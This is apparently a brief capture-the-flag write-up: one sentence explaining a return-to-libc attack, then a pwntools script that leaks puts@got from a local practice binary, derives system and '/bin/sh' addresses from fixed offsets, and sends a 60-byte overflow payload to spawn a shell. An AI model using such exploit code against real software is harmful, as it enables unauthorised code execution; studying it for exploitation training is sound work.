The binary lets you leak a libc address, so leak libc and then do return-to-libc (RTL) using the offsets from the leaked address to system and to the "/bin/sh" string.
```python
from pwn import *

r = process("./ret2lib")
elf = ELF("./ret2lib")

system_offset = 0x24f00  # puts - system in the target libc
cmd = "/bin/sh\x00"

print r.recv()
r.sendline("134520860")  # address of puts@got, in decimal; the program prints its contents
pause()

# Parse the leaked puts address from the "address : <hex>" line
r.recvuntil("address : ")
libc_puts = r.recvuntil("\x0a").replace("\x0a", "")
libc_puts = int(libc_puts, 16)
log.info("libc_puts = {}".format(hex(libc_puts)))

# Compute system and "/bin/sh" from the leak using fixed libc offsets
libc_system = libc_puts - system_offset
log.info("libc_system = {}".format(hex(libc_system)))
binsh = libc_puts + 0xfbd6b
log.info("/bin/sh = {}".format(hex(binsh)))

# RTL payload: padding up to the saved return address, then system, a dummy return address, and the argument
payload = "A" * 60
payload += p32(libc_system)
payload += "DDDD"
payload += p32(binsh)

r.sendline(payload)
r.interactive()
```